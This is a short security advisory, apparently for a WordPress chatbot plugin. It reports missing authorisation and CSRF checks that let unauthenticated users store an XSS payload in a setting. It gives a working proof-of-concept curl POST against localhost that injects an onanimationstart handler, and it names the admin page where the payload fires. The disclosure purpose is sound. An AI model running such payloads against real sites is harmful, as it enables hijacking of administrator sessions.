The plugin does not have authorisation and CSRF in a function hooked to init, allowing unauthenticated users to update some settings, leading to Stored XSS due to the lack of escaping when outputting them in the admin dashboard
curl -X POST --data 'qc_bot_str_weight=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' http://127.0.0.1/
The XSS will be trigged when an admin view the Simple Text response dashboard (/wp-admin/admin.php?page=simple-text-response)